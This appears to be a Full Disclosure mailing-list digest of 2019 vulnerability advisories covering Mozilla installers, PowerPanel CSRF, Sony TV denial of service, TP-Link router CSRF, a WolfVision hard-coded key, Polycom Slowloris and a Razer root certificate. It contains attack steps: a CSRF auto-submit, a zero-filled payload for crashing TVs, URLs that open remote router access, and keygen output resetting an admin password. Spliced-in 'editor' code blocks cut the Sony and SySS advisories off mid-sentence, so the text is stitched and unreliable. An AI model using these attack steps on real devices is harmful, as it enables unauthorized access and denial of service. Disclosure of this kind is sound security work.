[FD] Mozilla's MSI installers: FUBAR (that's spelled "fucked-up beyond all repair")

2019-07-09 Thread Stefan Kanthak
Hi @ll,

Mozilla finally provides MSI installers for their just released
Firefox 68 and Firefox 68 ESR for Windows:



These MSI installers are, however, DEFECTIVE, VULNERABLE and a bluff:
Mozilla just wrapped their (UPX-compressed) 7-zip self-extractors,
which unpack the final NSIS installer to %TEMP% and run it from
there, preserving all their already reported deficiencies and
vulnerabilities: see (among others)



Demonstration:
~~
In the user account created during Windows setup, add the NTFS
ACL "(D;OIIO;WP;;;WD)" meaning "deny execution of files for
everybody, inheritable to files in all subdirectories" to your
%TEMP%\ directory, then run the MSI installer.

As soon as the error dialog "7-Zip: (x) Access Denied!" is shown
peek into %SystemRoot%\Installer\ and your %TEMP%\ directory:

- the most recent "%SystemRoot%\Installer\MSI<4 hex digits>.tmp"
  is the UPX-compressed 7-zip self-extractor which is wrapped in
  the bogus MSI installer;

- this 7-zip self-extractor is run (elevated!) with the following
  command line:

    MSI*.tmp /S /TaskbarShortcut=true /DesktopShortcut=true
      /StartMenuShortcut=true /MaintenanceService=true
      /RemoveDistribution=true /PreventRebootRequired=false
      /OptionalExtensions=true /LaunchedFromMSI

- it creates an UNPROTECTED subdirectory %TEMP%\7zS<8 hex digits>\
  which inherits the NTFS ACL from its parent %TEMP%\, thus
  granting full access for the (unprivileged) user account, who
  can tamper with the extracted files in any way, then runs (here:
  tries to run) the extracted "%TEMP%\7zS<8 hex digits>\setup.exe"
  elevated.


stay tuned, and FAR away from Mozilla's crap!
Stefan Kanthak

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] PowerPanel Business Edition 3.4.0 - Cross Site Request Forgery

2019-07-09 Thread Joey Lane via Fulldisclosure
# Exploit Title: PowerPanel Business Edition 3.4.0 - Cross Site Request Forgery
# Date: 7/9/2019
# Exploit Author: Joey Lane
# Vendor Homepage: https://www.cyberpowersystems.com
# Version: 3.4.0
# Tested on: Ubuntu 16.04
# CVE : CVE-2019-13071
# Reported to vendor on 5/25/2019, no acknowledgement.

The Agent/Center component of PowerPanel Business Edition is vulnerable to
cross site request forgery. This can be exploited by tricking an
authenticated user into visiting a web page controlled by a malicious
person.

The following example uses CSRF to disable Status Recording under the Logs
/ Settings page.  Create a file named 'csrf.html' on a local workstation
with the following contents:




  
  
  
  
  
  
  
  


document.getElementById("csrf-form").submit()

Serve the file using python or any other web server:

python -m SimpleHTTPServer 8000

Visit the local page in a browser while logged into PowerPanel Business
Edition:

http://localhost:8000/csrf.html

The hidden form is submitted in the background, and will disable Status
Recording.  This could be adapted to exploit other forms in the web
application as well.



[FD] Two vulnerabilities found in Sony BRAVIA Smart TVs

2019-07-09 Thread xen1thLabs
## ADVISORY INFORMATION

TITLE: Two vulnerabilities found in Sony BRAVIA Smart TVs
ADVISORY URLS:
CVE-2019-11889:
https://www.darkmatter.ae/xen1thlabs/sony-remote-denial-of-service-triggered-over-vulnerability-hbbtv-xl-19-014/
CVE-2019-11890:
https://www.darkmatter.ae/xen1thlabs/sony-remote-denial-of-service-over-wifi-lan-internet-vulnerability-xl-19-013/

DATE PUBLISHED: 02/07/2019
AFFECTED VENDORS: Sony
RELEASE MODE: Coordinated release
CVE: CVE-2019-11889, CVE-2019-11890
CVSSv3 for CVE-2019-11889: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
CVSSv3 for CVE-2019-11890: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

## PRODUCT DESCRIPTION
BRAVIA is a brand of Sony Visual Products known as Smart TVs. 
These Smart TVs are known to be high standard products.


## DETAILS OF VULNERABILITIES
xen1thLabs has found two vulnerabilities in Sony products and coordinated 
the disclosure of these security flaws with Sony. The vulnerabilities have 
been found in the Sony Bravia Smart TV by xen1thLabs while auditing the 
security of Smart TVs. The list of affected models has not been shared by Sony. 
xen1thLabs tested several Sony Bravia Smart TVs.

The summary of the vulnerabilities is:

- CVE-2019-11889 Sony Remote Denial-of-Service Triggered Over HbbTV Vulnerability:
  This vulnerability allows an attacker to remotely crash the HbbTV rendering
  engine and block the TV.

- CVE-2019-11890 Sony Remote Denial-of-Service Over Wifi / LAN / Internet Vulnerability:
  This vulnerability allows an attacker to remotely crash the Smart TV using
  TCP packets.

### 1. CVE-2019-11889 Sony Remote Denial-of-Service Triggered Over HbbTV Vulnerability

By sending a specifically crafted webpage over HbbTV it is possible to freeze
the television remotely (for a description of HbbTV, please see the presentation
at HITB Dubai 2018:
https://conference.hitb.org/hitbsecconf2018dxb/sessions/hacking-into-broadband-and-broadcast-tv-systems/).

The remote control does not appear to work, except for the PROG+ and PROG-
buttons. Only changing channels allows the television to be 'un-frozen'.
Android is supposed to kill blocked applications.

In order to reproduce the behavior, start by generating a webpage using:

```
dd if=/dev/zero of=index.html bs=1M count=2048
```

Using a software-defined radio, send a DVB-T signal containing an HbbTV
application that forces the targeted Smart TV to load a file from a controlled
server. By forcing the Smart TV to load the generated file, it can be observed
from the logs that only between 180KB and 250KB are served before the HbbTV
application freezes:

```
vaccess.log:127.0.1.1:80 192.168.1.191 - - [01/Apr/2019:06:40:54 -0400] "GET /hbbtvtest/test3/ HTTP/1.1" 200 178647 "http://x.test/hbbtvtest/index.php" "Mozilla/5.0 (Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 OPR/29.0.1803.0 OMI/4.5.23.37.ALSAN5.131 HbbTV/1.2.1 (; Sony; KD-65X7500D; v1.0; 2016;) sony.hbbtv.tv.2016HE"

vaccess.log.1:127.0.1.1:80 192.168.1.191 - - [01/Apr/2019:02:36:16 -0400] "GET /hbbtvtest/test3/ HTTP/1.1" 200 170543 "http://x.test/hbbtvtest/index.php" "Mozilla/5.0 (Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 OPR/29.0.1803.0 OMI/4.5.23.37.ALSAN5.131 HbbTV/1.2.1 (; Sony; KD-65X7500D; v1.0; 2016;) sony.hbbtv.tv.2016HE"
```
Sony investigated the issue and shared the following analysis:
"MITM attack by http connection is caused by the specification of the HbbTV 
service". 

### 2. CVE-2019-11890 Sony Remote Denial-of-Service Over Wifi / LAN / Internet Vulnerability

An unauthenticated remote attacker can SYN-flood the Smart TV over LAN and
Wi-Fi; the television freezes and becomes unresponsive, some programs crash
and the television reboots randomly. No PoC is released, due to the low
complexity of exploitation and because Sony is not planning to release a
security patch.

Sony investigated the issue and shared the following analysis:
"The Sony Product teams have conducted additional research regarding the
submission and identified the following: CVE-2019-1189: DoS over WiFi /LAN -
This is due to the performance of the interrupt operation in the Linux driver".

## SOLUTION
Sony provided the following recommendation:
"Sony's manual instructs users to: Make sure to connect to the Internet or home
network via a router, which will minimize this risk. In addition, these two
symptoms can be recovered by unplugging the power supply cable. The TV cannot be
broken and there is no internal data that can be stolen by these actions."
(May 30th, 2019).

And informed xen1thLabs that:
"we will not be releasing any notifications." (June 19th, 2019).

## DISCLOSURE TIMELINE
01/04/2019 - Vulnerabilities have been found by xen1thLabs
28/04/2019 - xen1thLabs send the report to Sony through their HackerOne Bug 
bounty program
02/05/2019 - Updates requested from xen1thLabs through HackerOne
10/05/2019 - 
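The two access-log lines in the advisory are the only hard evidence of how much of the 2 GiB payload a terminal pulled before its HbbTV engine stalled. The following parser is an added example by this editor, not xen1thLabs' tooling: it reads the `grep`-style lines (`<file>:<vhost>:<port>` prefix followed by Apache combined-format fields), pulls the vendor/model/version fields out of the HbbTV User-Agent (`HbbTV/<ver> (<capabilities>; <vendor>; <model>; <software>; <hardware>; <reserved>)`), and reports the largest response each terminal accepted. The two sample lines are the ones quoted above; everything else (function names, the constant for the payload size) is this example's own.

```python
import re
from collections import defaultdict

# Sample input: the two request lines quoted in the advisory, embedded here so the
# example runs offline. They are grep output, i.e. "<file>:<vhost>:<port> ..." followed
# by the usual Apache combined-format fields.
LOG_LINES = [
    'vaccess.log:127.0.1.1:80 192.168.1.191 - - [01/Apr/2019:06:40:54 -0400] "GET /hbbtvtest/test3/ HTTP/1.1" 200 178647 "http://x.test/hbbtvtest/index.php" "Mozilla/5.0 (Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 OPR/29.0.1803.0 OMI/4.5.23.37.ALSAN5.131 HbbTV/1.2.1 (; Sony; KD-65X7500D; v1.0; 2016;) sony.hbbtv.tv.2016HE"',
    'vaccess.log.1:127.0.1.1:80 192.168.1.191 - - [01/Apr/2019:02:36:16 -0400] "GET /hbbtvtest/test3/ HTTP/1.1" 200 170543 "http://x.test/hbbtvtest/index.php" "Mozilla/5.0 (Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 OPR/29.0.1803.0 OMI/4.5.23.37.ALSAN5.131 HbbTV/1.2.1 (; Sony; KD-65X7500D; v1.0; 2016;) sony.hbbtv.tv.2016HE"',
]

# Size of the index.html produced by "dd if=/dev/zero of=index.html bs=1M count=2048".
PAYLOAD_BYTES = 2048 * 1024 * 1024

# Apache combined format with the optional "<file>:" grep prefix and a "<vhost>:<port>" first field.
LOG_RE = re.compile(
    r'^(?:(?P<file>[^:\s]+):)?(?P<vhost>[^:\s]+):(?P<vport>\d+) '
    r'(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# HbbTV User-Agent token: HbbTV/<version> (<capabilities>; <vendor>; <model>; <software>; <hardware>; <reserved>)
HBBTV_UA_RE = re.compile(
    r'HbbTV/(?P<version>[\d.]+) \('
    r'(?P<capabilities>[^;]*); (?P<vendor>[^;]*); (?P<model>[^;]*); '
    r'(?P<software>[^;]*); (?P<hardware>[^;]*);(?P<reserved>[^)]*)\)'
)


def parse_line(line):
    """Return a dict of the log fields plus an 'hbbtv' sub-dict (or None), or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["bytes"] = 0 if rec["bytes"] == "-" else int(rec["bytes"])
    ua = HBBTV_UA_RE.search(rec["ua"])
    rec["hbbtv"] = ua.groupdict() if ua else None
    return rec


def bytes_served_per_terminal(lines):
    """Largest response body each HbbTV terminal (client IP, vendor, model) accepted.

    With a payload far larger than any of these values, the figure is effectively how far
    the terminal read before the HbbTV application stopped consuming the response."""
    served = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["hbbtv"] is None:
            continue  # not an HbbTV client, or a line in a different format
        key = (rec["client"], rec["hbbtv"]["vendor"], rec["hbbtv"]["model"])
        served[key] = max(served[key], rec["bytes"])
    return dict(served)


if __name__ == "__main__":
    for (client, vendor, model), n in bytes_served_per_terminal(LOG_LINES).items():
        print(f"{client} {vendor} {model}: {n} bytes of {PAYLOAD_BYTES} "
              f"({100.0 * n / PAYLOAD_BYTES:.4f}%) before the client stopped reading")
```

The referer filter in `LOG_RE` is deliberately simple (`[^"]*`); if your log format escapes quotes inside the referer or user-agent, switch to Apache's `%{User-Agent}i` escaping rules before trusting the field boundaries.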

[FD] Vulnerabilities in TP-Link TL-WR940N and TL-WR941ND

2019-07-09 Thread MustLive
Hello list!

There are Brute Force and Cross-Site Request Forgery vulnerabilities
in TP-Link TL-WR940N and TL-WR941ND. This follows my 2017 advisory about
vulnerabilities in TP-Link TL-WR841N and TL-WR841ND.

-
Affected products:
-

The following models are vulnerable: TP-Link TL-WR940N and TL-WR941ND,
Firmware Version 3.16.9 Build 151216. All other versions must also be
vulnerable. I have informed TP-Link about vulnerabilities in various of
their devices since 2017, but there have been no answers from the vendor.

--
Details:
--

Brute Force (WASC-11):

http://192.168.0.1

There is no protection against BF attacks in the login form. By default, access
from the Internet is closed, so it's only possible to guess the password via
the LAN. But via CSRF attacks it's possible to open remote access.

Cross-Site Request Forgery (WASC-09):

In section Remote Control.

Turn off access via
Internet:http://192.168.0.1/YVNLOORCJBATZQDB/userRpm/ManageControlRpm.htm?port=80=0.0.0.0=1

Turn on access via
Internet:http://192.168.0.1/YVNLOORCJBATZQDB/userRpm/ManageControlRpm.htm?port=80=255.255.255.255=1

To bypass the protection, it is necessary to set the Referer header and the
path (YVNLOORCJBATZQDB), which changes at every login to the admin panel.
This path can be found through information leakage, social engineering
or XSS vulnerabilities in the admin panel. In old versions there is no
such protection, so it's easy to conduct this and other CSRF attacks.

Cross-Site Request Forgery (WASC-09):

Logout from admin panel via request to page http://192.168.0.1.

http://192.168.0.1;>

I mentioned these vulnerabilities on my site
(http://websecurity.com.ua/8407/).

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

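Both the PowerPanel post (a hidden form auto-submitted from an attacker's page) and the TP-Link post (a per-login random path plus a Referer check that can be bypassed once the path leaks) describe the same server-side decision: does a session cookie alone authorise a state-changing request? The following is this editor's added example, not code from either vendor or poster. It models the two policies side by side: `cookie_only()` is the behaviour both advisories report, and `allowed()` generalises the TP-Link defence by requiring a per-login secret path segment and a same-origin `Origin` (preferred) or `Referer` header. The class, the header dictionary (assumed to carry canonical header names), the session ids and the paths are all constructed for the example.

```python
import hmac
import secrets
from typing import Dict, Optional
from urllib.parse import urlsplit


class CsrfGuard:
    """Server-side authorisation of state-changing requests on an embedded web UI."""

    def __init__(self, site_origin: str) -> None:
        self.site_origin = site_origin          # e.g. "http://192.168.0.1" (scheme + host[:port])
        self._sessions: Dict[str, str] = {}     # session id -> per-login random path token

    def login(self, session_id: str) -> str:
        """Issue a fresh random path token at login; the UI embeds it in every form action URL."""
        token = secrets.token_urlsafe(12)
        self._sessions[session_id] = token
        return token

    def cookie_only(self, session_id: str) -> bool:
        """Vulnerable policy (what the two advisories describe): a valid session cookie is enough.
        The victim's browser attaches that cookie to a form submitted from any origin, so a
        forged request is indistinguishable from a genuine one."""
        return session_id in self._sessions

    def allowed(self, session_id: str, path: str, headers: Dict[str, str]) -> bool:
        """Hardened policy: valid session AND correct per-login path token AND same-origin source."""
        token: Optional[str] = self._sessions.get(session_id)
        if token is None:
            return False
        first_segment = path.lstrip("/").split("/", 1)[0]
        # Constant-time comparison; encode so non-ASCII input cannot raise TypeError.
        if not hmac.compare_digest(first_segment.encode("utf-8"), token.encode("utf-8")):
            return False
        # Browsers send Origin on cross-site form POSTs; Referer may be suppressed by
        # referrer policies, so it is only a fallback. Neither present: refuse.
        source = headers.get("Origin") or headers.get("Referer")
        if not source:
            return False
        parts = urlsplit(source)
        return f"{parts.scheme}://{parts.netloc}" == self.site_origin


if __name__ == "__main__":
    guard = CsrfGuard("http://192.168.0.1")
    token = guard.login("sid-1234")  # victim logs in; the browser now holds the session cookie

    # Forged request: an attacker page auto-submits a form to the device. The browser adds the
    # cookie, but the page cannot know the per-login path and its source is the attacker origin.
    forged_headers = {"Origin": "http://attacker.example",
                      "Referer": "http://attacker.example/csrf.html"}
    print("cookie-only policy accepts forgery:", guard.cookie_only("sid-1234"))
    print("hardened policy accepts forgery:  ",
          guard.allowed("sid-1234", "/userRpm/ManageControlRpm.htm", forged_headers))

    # Genuine request from the device's own UI, which knows the token and is same-origin.
    genuine_headers = {"Referer": f"http://192.168.0.1/{token}/userRpm/ManageControlRpm.htm"}
    print("hardened policy accepts genuine:  ",
          guard.allowed("sid-1234", f"/{token}/userRpm/ManageControlRpm.htm", genuine_headers))
```

The TP-Link post also points out the weakness of carrying the secret in the URL path: it leaks through the Referer header of every outbound link and through any XSS in the admin panel. A synchronizer token in the request body (not the URL) with a `Referrer-Policy` of `same-origin` closes the first leak; XSS defeats any CSRF defence and has to be fixed on its own.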


[FD] UPDATE: [SYSS-2019-021]: WolfVision Cynap - Use of Hard-coded Cryptographic Key (CWE-321) [CVE-2019-13352]

2019-07-09 Thread Matthias Deeg
Advisory ID: SYSS-2019-021
Product: Cynap
Manufacturer: WolfVision
Affected Version(s): 1.18g, 1.28j
Tested Version(s): 1.18g, 1.28j
Vulnerability Type: Use of Hard-coded Cryptographic Key (CWE-321)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2019-05-03
Solution Date: 2019-06-19
Public Disclosure: 2019-07-04
CVE Reference: CVE-2019-13352
Authors of Advisory: Manuel Stotz, Gerhard Klostermeier (SySS GmbH)



Overview:

WolfVision Cynap is a wireless collaboration and presentation system.

The manufacturer describes the product as follows [1]:

"Cynap is a stand-alone all-in-one wireless collaboration and
presentation system which includes a built-in media player, web
conferencing, on-board recording and streaming , BYOD screen sharing
for all mobile devices, and annotation functionality, making it the
ideal device to form the centrepiece of new and adapted classrooms and
meeting spaces."

Due to the use of a hard-coded cryptographic key, an attacker can
generate support PINs for resetting the administrative user password in
order to gain administrative access to the device.



Vulnerability Details:

SySS GmbH found out that the WolfVision Cynap wireless collaboration
and presentation system uses a static, hard-coded cryptographic secret
for generating support PINs used for the provided 'forgot password'
functionality.

By knowing this static secret and the corresponding algorithm for
calculating support PINs, an attacker can reset the password of the
administrative user account "ADMIN" and thus gain unauthorized access to
the affected Cynap device via a network connection.



Proof of Concept (PoC):

SySS GmbH developed a software tool for generating support PINs either
in online or offline mode.

The following output of the software tool illustrates a successful
attack resulting in a reset of the password for the administrative user
account "ADMIN".

$ python ./wolfvision_cynap_keygen.py --online 192.168.40.109
WolfVision vSolution Cynap Keygen
   by
  Manuel Stotz
  Gerhard Klostermeier

[*] Launch keygen in online mode ... [OK]
[*] Gathering data ... [OK]
[*] Serialnumber: 
[*] Support PIN: 447301
[*] Generating new Support PIN ... [OK]
[+] New Support PIN: 723247
[*] Account: ADMIN
[*] Password: Password
[*] Bye!

A successful attack against a vulnerable WolfVision Cynap device gaining
administrative access is demonstrated in our SySS PoC video
"Administrating WolfVision Cynap the Hacker's Way" [5].



Solution:

Install the firmware version 1.30j provided by the manufacturer
WolfVision [2].



Disclosure Timeline:

2019-05-03: Vulnerability reported to manufacturer
2019-05-10: Vulnerability reported to manufacturer again
2019-05-13: Manufacturer confirms receipt of security advisory
2019-05-31: Manufacturer schedules firmware update 1.30j with fix for
the reported security issue
2019-06-19: Release of firmware update 1.30j including security fix
2019-07-04: Public release of SySS security advisory
2019-07-08: Release of updated security advisory with assigned CVE ID



References:

[1] Product website for WolfVision Cynap

https://www.wolfvision.com/vsolution/index.php/en/presentation-systems/cynap/cynap
[2] WolfVision firmware downloads
https://wolfvision.com/vsolution/index.php/de/support/downloads
[3] SySS Security Advisory SYSS-2019-021

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-021.txt
[4] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/
[5] SySS Proof-of-Concept Video "Administrating WolfVision Cynap the
Hacker's Way"
https://youtu.be/veEtiYAWvMY



Credits:

This security vulnerability was found by Manuel Stotz and Gerhard
Klostermeier of SySS GmbH.

E-Mail: manuel.stotz (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Manuel_Stotz.asc
Key fingerprint = F051 5B74 7E70 193E 7F66 0133 E790 F68A BCE6 8C6D

E-Mail: gerhard.klostermeier (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/PGPKeys/Gerhard_Klostermeier.asc
Key fingerprint = 8A9E 75CC D510 4FF6 8DB5 CC30 3802 3AAB 573E B2E7



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of 
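As an added illustration of the weakness class (CWE-321) behind this advisory, the following is this editor's example, not SySS's keygen and not WolfVision's implementation, whose secret and algorithm the advisory deliberately does not publish. `derive_support_pin` is a hypothetical HMAC-SHA256-based scheme; the firmware constant, serial numbers and per-device secrets are made up. It contrasts a design where one secret is baked into every firmware image (so extracting it once lets an attacker compute the support PIN for any unit whose serial number they can read) with one where each unit holds its own randomly generated secret.

```python
import hashlib
import hmac
import secrets
from typing import Optional


def derive_support_pin(secret: bytes, serial: str, digits: int = 6) -> str:
    """Derive a numeric support PIN from a secret and the device serial number.

    Hypothetical scheme (HMAC-SHA256 over the serial, truncated to `digits` decimal digits),
    used only to illustrate CWE-321; it is not WolfVision's algorithm."""
    mac = hmac.new(secret, serial.encode("utf-8"), hashlib.sha256).digest()
    return f"{int.from_bytes(mac[:8], 'big') % 10 ** digits:0{digits}d}"


class SharedSecretDevice:
    """Vulnerable design: every unit derives its PIN from one constant shipped in the firmware.
    Whoever extracts that constant once can compute every unit's PIN offline."""

    FIRMWARE_SECRET = b"example-constant-present-in-every-firmware-image"  # hypothetical value

    def __init__(self, serial: str) -> None:
        self.serial = serial

    def verify_support_pin(self, pin: str) -> bool:
        expected = derive_support_pin(self.FIRMWARE_SECRET, self.serial)
        return hmac.compare_digest(expected, pin)


class PerDeviceSecretDevice:
    """Hardened design: each unit gets its own random secret at manufacture or first boot and
    stores it only locally, so a leak from one unit (or from a firmware image, which contains
    no secret at all) yields nothing for the others."""

    def __init__(self, serial: str, secret: Optional[bytes] = None) -> None:
        self.serial = serial
        self._secret = secret if secret is not None else secrets.token_bytes(32)

    def verify_support_pin(self, pin: str) -> bool:
        expected = derive_support_pin(self._secret, self.serial)
        return hmac.compare_digest(expected, pin)


def attacker_pin(extracted_secret: bytes, target_serial: str) -> str:
    """What an attacker computes offline once they hold a secret and know the target's serial.
    The serial is not a secret: the advisory's keygen reads it from the device in online mode."""
    return derive_support_pin(extracted_secret, target_serial)


if __name__ == "__main__":
    # Shared constant: one extraction compromises any unit whose serial the attacker can read.
    victim = SharedSecretDevice("SN-0001")
    print("shared secret, forged PIN accepted:",
          victim.verify_support_pin(attacker_pin(SharedSecretDevice.FIRMWARE_SECRET, "SN-0001")))

    # Per-device secret: a secret lifted from unit A does not produce a valid PIN for unit B.
    unit_a, unit_b = PerDeviceSecretDevice("SN-0001"), PerDeviceSecretDevice("SN-0002")
    print("per-device secret, A's secret forges B's PIN:",
          unit_b.verify_support_pin(attacker_pin(unit_a._secret, "SN-0002")))
```

A six-digit PIN is also a small search space; a real 'forgot password' path needs rate limiting or a short validity window on top of an unpredictable secret, otherwise the per-device secret merely converts a one-shot computation into a million-guess online attack.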

[FD] Polycom RealPresence Touch device vulnerable to Slowloris attack (hardware version 7; OS version 2.1.2-255)

2019-07-09 Thread Eitan shav
[Description]
Polycom RealPresence Touch devices (hardware version 7; operating
system version 2.1.2-255) allow remote attackers to cause a denial of
service (networking outage) by sending "Slowloris" packet data to the
login interface.

[VulnerabilityType]
Slowloris DoS

[Vendor of Product]
Polycom

[Affected Product Code Base]
RealPresence Touch device - Hardware version: 7, operating system version: 2.1.2-255

[Attack Type]
Remote

[Has vendor confirmed or acknowledged the vulnerability?]
true

[Discoverer]
Eitan Shav from Citadel Cyber Security

[Reference]
https://www.poly.com/us/en

[Screenshots of POC]
1. The login page (before the attack):
https://drive.google.com/open?id=1GFWdayd4Bllk9jGl6Z_ypzD7zkXTg-Rd
2. Establishing the attack:
https://drive.google.com/open?id=1yyBULB1LuWqbO4ZAqz-4XMJs6qlv4Q_l
3. Trying to access the login page (after the attack):
https://drive.google.com/open?id=10Vp7U7RH6efX7c_V62jeq-umfyVI6o6O

[FD] Razer Synapse 3, Laptops Ship with Re-used Root Certificate with Private Key

2019-07-09 Thread No One
Razer is a company that produces gaming-centric computer peripherals,
laptops, desktops, and mobile phones.  Many of their products allow for
rich customization of device lighting effects.  These features are managed
by a client application called Synapse.

On Windows, Razer Synapse 3 installs an optional component - the Razer
Chroma SDK - by default.  This component installs a root certificate - with
the private key - which is the same across installs. This key is
extractable on Windows hosts, and can subsequently be used to launch
SSL/MITM attacks against other Razer Synapse users.

Additionally, since Razer Synapse 3/Chroma SDK come pre-installed on many
Razer products - such as the Stealth and Blade laptops - many of these
consumer laptops came shipped with this root certificate already installed,
and are vulnerable out of the box.

This flaw impacts Razer Synapse 3 version 1.0.103.136, build
3.4.0415.04181, and may impact older versions.

Some Synapse 3 versions available publicly through May and June of 2019
were not tested and may be impacted as well.

This flaw appears to have been addressed by a fix in Razer Chroma SDK Core
3.4.3, and also appears to be addressed in the latest version of Synapse 3
available on Razer's website at https://www.razer.com/synapse-3 which
installs version 1.0.103.136, build 3.4.0630.062510.

These versions still install a root certificate with private key - and are
thus able to MITM local TLS network traffic and undermine other local
cryptographic operations - but the certificate is now generated per-install.

Users can confirm whether or not they're impacted by checking for the
following certificate in their Windows "Trusted Root Certification
Authorities" Store:

Common Name: Razer Chroma SDK

Thumbprint: 043eaddad0a8fbeeac75689b5b1425d90c247218

Valid from May 13, 2018 to May 10, 2028

Users can also test whether they're vulnerable by visiting
https://razerfish.org in either Chrome or Edge.  Impacted systems will not
encounter an SSL error when navigating to this website, which has an SSL
certificate signed with the re-used certificate.

End users who updated Synapse 3 appropriately may no longer be impacted.
However, users who haven't updated - or who may have removed the Chroma SDK
in non-standard ways - may still be at risk.  Similarly, many consumer
devices may be vulnerable immediately after purchase depending on their
manufacture/ship date.

Users can mitigate this risk independently by removing the above named
certificate, or downloading the latest version of Synapse 3 and confirming
that it properly removes this certificate.

*Reporting Coordination/Timeline*

This vulnerability was reported to Razer via HackerOne on Mar 20th, 2019.
There hasn't been any substantial communication from the Razer team about
their preferences on disclosure since a tentative fix was tested in April.

Given the limited response, and since an update alone isn't guaranteed to
mitigate this issue for all Razer consumers, I've opted to publish this
publicly after three requests for guidance from Razer.

March 20th - Issue reported on HackerOne

March 25th - HackerOne forwards issue to Razer

April 30th - HackerOne requests confirmation of fix in Chroma SDK Core
3.4.3, fix confirmed

May 1st - HackerOne/Razer acknowledge an initial request for public
disclosure, say they'll look into it

May 15th - HackerOne says they've not heard back from Razer

May 31st - Requested disclosure on 90-day mark/June 20th, HackerOne says
they're still waiting on an update from Razer

June 27th - Requested update on case, propose disclosure on July 8th

July 8th - No response from HackerOne or Razer, posted to FD

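The post gives the thumbprint of the re-used root and tells users to look for it in the Trusted Root store. The script below is this editor's added example, not Razer's or the poster's code: it computes Windows-style thumbprints (SHA-1 over the DER encoding) and searches the `ROOT` store through the standard library's Windows-only `ssl.enum_certificates`, which is a fleet-friendlier check than clicking through certmgr. The helper names are this example's own; the byte strings used in the test are constructed, not real certificates.

```python
import hashlib
import ssl
from typing import Iterable, List, Optional

# Thumbprint named in the post: the SHA-1 of the certificate's DER encoding, which is what
# the Windows certificate UI displays as "Thumbprint".
RAZER_CHROMA_SDK_THUMBPRINT = "043eaddad0a8fbeeac75689b5b1425d90c247218"


def thumbprint(der: bytes) -> str:
    """Windows-style thumbprint: lowercase hex SHA-1 of the DER bytes."""
    return hashlib.sha1(der).hexdigest()


def normalise(tp: str) -> str:
    """Accept the spellings the UI produces (spaces, colons, upper case)."""
    return tp.replace(" ", "").replace(":", "").lower()


def find_by_thumbprint(certs: Iterable[bytes], wanted: str) -> Optional[bytes]:
    """Return the DER blob whose thumbprint equals `wanted`, or None."""
    wanted = normalise(wanted)
    for der in certs:
        if thumbprint(der) == wanted:
            return der
    return None


def windows_store_certs(store: str = "ROOT") -> List[bytes]:
    """DER blobs from a Windows system certificate store ("ROOT" = Trusted Root CAs).
    ssl.enum_certificates exists only in Windows builds of CPython; elsewhere we fail loudly."""
    if not hasattr(ssl, "enum_certificates"):
        raise OSError("ssl.enum_certificates is only available on Windows")
    return [der for der, encoding, _trust in ssl.enum_certificates(store)
            if encoding == "x509_asn"]  # skip PKCS#7 blobs


def razer_cert_present() -> bool:
    """True when the re-used 'Razer Chroma SDK' root is trusted on this Windows host."""
    return find_by_thumbprint(windows_store_certs("ROOT"), RAZER_CHROMA_SDK_THUMBPRINT) is not None


if __name__ == "__main__":
    try:
        present = razer_cert_present()
    except OSError as exc:
        print(exc)
    else:
        print("re-used Razer Chroma SDK root present:", present)
```

If the check reports the certificate, the removal the post recommends can be done from an elevated prompt with the built-in tool: `certutil -delstore Root 043eaddad0a8fbeeac75689b5b1425d90c247218` for the machine store, and `certutil -user -delstore Root 043eaddad0a8fbeeac75689b5b1425d90c247218` for the current user's store. Re-run the check afterwards and after any Synapse update, since the post notes that an update is not guaranteed to remove the old certificate.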